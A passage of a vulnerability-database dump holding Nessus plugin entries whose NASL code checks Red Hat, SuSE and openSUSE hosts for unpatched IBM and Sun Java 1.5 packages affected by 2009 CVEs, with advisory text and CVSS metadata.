value:\"https://access.redhat.com/security/cve/cve-2009-3874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3877\"\n );\n # http://www.ibm.com/developerworks/java/jdk/alerts/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.ibm.com/javasdk/support/security-vulnerabilities/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1647\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-javacomm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1647\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-demo-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-devel-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"s390\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-plugin-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-src-1.5.0.11-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-demo-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-devel-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-plugin-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-src-1.5.0.11-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.5.0-ibm / java-1.5.0-ibm-accessibility / java-1.5.0-ibm-demo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:26", "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues. It also contains a timezone update for the\ncurrent Fiji change (timezone 1.6.9s).\n\nThe update fixes the following security issues : \n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876, CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also refer to http://www.ibm.com/developerworks/java/jdk/alerts\nfor more information about this update.", "edition": 24, "published": "2009-12-27T00:00:00", "title": "SuSE9 Security Update : IBM Java 1.5.0 (YOU Patch Number 12564)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2009-12-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12564.NASL", "href": "https://www.tenable.com/plugins/nessus/43599", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43599);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-2493\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE9 Security Update : IBM Java 1.5.0 (YOU Patch Number 12564)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues. It also contains a timezone update for the\ncurrent Fiji change (timezone 1.6.9s).\n\nThe update fixes the following security issues : \n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876, CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also refer to http://www.ibm.com/developerworks/java/jdk/alerts\nfor more information about this update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12564.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"IBMJava5-JRE-1.5.0-0.76\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"IBMJava5-SDK-1.5.0-0.76\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:22", "description": "java-1_5_0-sun u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.", "edition": 25, "published": "2009-11-11T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-11T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-src", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin"], "id": "SUSE_11_1_JAVA-1_5_0-SUN-091109.NASL", "href": "https://www.tenable.com/plugins/nessus/42460", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-1529.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42460);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)\");\n script_summary(english:\"Check for the java-1_5_0-sun-1529 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"java-1_5_0-sun u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.\"\n );\n # http://cve.mitre.org/cve\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cve/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552581\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-alsa-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-devel-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-plugin-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-src-1.5.0_update22-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:12", "description": "java-1_5_0-sun u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 